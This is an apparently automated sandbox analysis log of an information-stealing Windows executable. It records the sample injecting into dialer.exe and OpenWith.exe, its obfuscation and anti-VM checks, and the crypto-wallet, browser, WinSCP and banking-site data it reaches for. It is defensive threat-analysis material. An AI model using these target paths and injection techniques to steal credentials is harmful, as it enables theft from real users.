Source: C:\Users\user\Desktop\wdeeFKntav.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\wdeeFKntav.exe "C:\Users\user\Desktop\wdeeFKntav.exe"
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\Desktop\wdeeFKntav.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
Source: wdeeFKntav.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: wdeeFKntav.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: wdeeFKntav.exe Static PE information: section name: .textbss
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC5AF4 pushad ; retf 0_3_00CC5B03
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC6285 push F693B671h; retf 0_3_00CC628A
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC7C52 push dword ptr [edx+ebp+3Bh]; retf 0_3_00CC7C5F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC5DCE push edi; iretd 0_3_00CC5DD5
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC2F4E push eax; retf 0_3_00CC2F4F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC6F48 push es; ret 0_3_00CC6F49
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC416F push ecx; iretd 0_3_00CC417B
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC657C push esi; ret 0_3_00CC6580
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC412F pushad ; ret 0_3_00CC4137
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C79429 push cs; retf 0_2_00C79565
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C78964 push ebx; retf 0_2_00C78965
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C7750E push ds; iretd 0_2_00C77517
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C81269 push edx; retf 0_2_00C81422
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00C7FF22 push edi; iretd 0_2_00C7FF2D
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02723E4E push edi; iretd 2_3_02723E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02725CD2 push dword ptr [edx+ebp+3Bh]; retf 2_3_02725CDF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02723B74 pushad ; retf 2_3_02723B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02724305 push F693B671h; retf 2_3_0272430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_027245FC push esi; ret 2_3_02724600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_027221EF push ecx; iretd 2_3_027221FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02724FC8 push es; ret 2_3_02724FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_02720FCE push eax; retf 2_3_02720FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_027221AF pushad ; ret 2_3_027221B7
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F044CA0 push edx; ret 3_2_00007DF41F044CAB
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F049D1E push esi; retf 000Ah 3_2_00007DF41F049D1F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F03ABBE str word ptr [ebp+ecx*4+05h] 3_2_00007DF41F03ABBE
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW, 3_2_00007DF41F058E20
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0B7344 GetSystemInfo, 3_2_00007DF41F0B7344
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2332693555.0000025B16D94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink
Source: OpenWith.exe, 00000003.00000003.2327644911.0000025B16FFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: dialer.exe, 00000002.00000002.2240725076.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331408408.0000025B14E80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC2277 mov eax, dword ptr fs:[00000030h] 0_3_00CC2277
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_0272027F mov eax, dword ptr fs:[00000030h] 2_3_0272027F
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00CC0AA0 HeapCreate,HeapAlloc,HeapAlloc,GetModuleHandleA,HeapAlloc,CreateEventA,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,HeapAlloc,memcpy,HeapFree,WaitForSingleObject,FindCloseChangeNotification,VirtualFree,GetProcessHeap,HeapFree,HeapDestroy, 0_2_00CC0AA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 3_2_0000025B14E21A90
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 3_2_00007DF41F04F83C
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !CP:Defichain-Electrum
Source: OpenWith.exe, 00000003.00000003.2319977059.0000025B16E29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceP
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
